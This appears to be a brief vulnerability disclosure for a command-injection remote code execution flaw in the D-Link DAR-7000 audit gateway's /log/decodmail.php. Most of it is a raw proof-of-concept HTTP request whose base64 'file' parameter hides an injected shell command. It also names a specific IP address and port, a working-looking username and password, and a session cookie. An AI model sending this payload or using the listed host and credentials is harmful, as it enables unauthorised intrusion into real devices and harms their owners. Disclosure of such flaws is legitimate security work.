The D-LINK DAR-7000 series online behavior audit gateway has a RCE vulnerability. Attackers can exploit vulnerabilities to gain server privileges or cause business impact on the system.
official: http://www.dlink.com.cn/
version:DAR-7000
Vulnerability Path :/log/decodmail.php
https://60.22.74.195:8443
Account password: test/ admin@123 poc:
GET /log/decodmail.php?file=L2V0Yy9gc2xlZXAke0lGU30xMGAucGNhcA== HTTP/1.1
Host: 60.22.74.195:8443
Cookie: PHPSESSID=bdb1aa1392da0420192cff3c34e507d6
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers
Connection: close
![image](https://private-user-images.githubusercontent.com/88701694/267224987-1624c50c-8650-49d4-ae4b-da1eb77e7028.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MjA4NTYyNjAsIm5iZiI6MTcyMDg1NTk2MCwicGF0aCI6Ii84ODcwMTY5NC8yNjcyMjQ5ODctMTYyNGM1MGMtODY1MC00OWQ0LWFlNGItZGExZWI3N2U3MDI4LnBuZz9YLUFtei1BbGdvcml0aG09QVdTNC1ITUFDLVNIQTI1NiZYLUFtei1DcmVkZW50aWFsPUFLSUFWQ09EWUxTQTUzUFFLNFpBJTJGMjAyNDA3MTMlMkZ1cy1lYXN0LTElMkZzMyUyRmF3czRfcmVxdWVzdCZYLUFtei1EYXRlPTIwMjQwNzEzVDA3MzI0MFomWC1BbXotRXhwaXJlcz0zMDAmWC1BbXotU2lnbmF0dXJlPTQ1ZmRkOThjZDZjYTZiZDUxN2ZkODRhZDc3N2RmNmFmOWJlOWE5NDIzZDU3MjBkNTIyMjk0N2U1Mzg4YTFiN2ImWC1BbXotU2lnbmVkSGVhZGVycz1ob3N0JmFjdG9yX2lkPTAma2V5X2lkPTAmcmVwb19pZD0wIn0.HJs8YZp57fvbCG1WiDR46blKOt7g5gQ6iI5H-rwrrZM)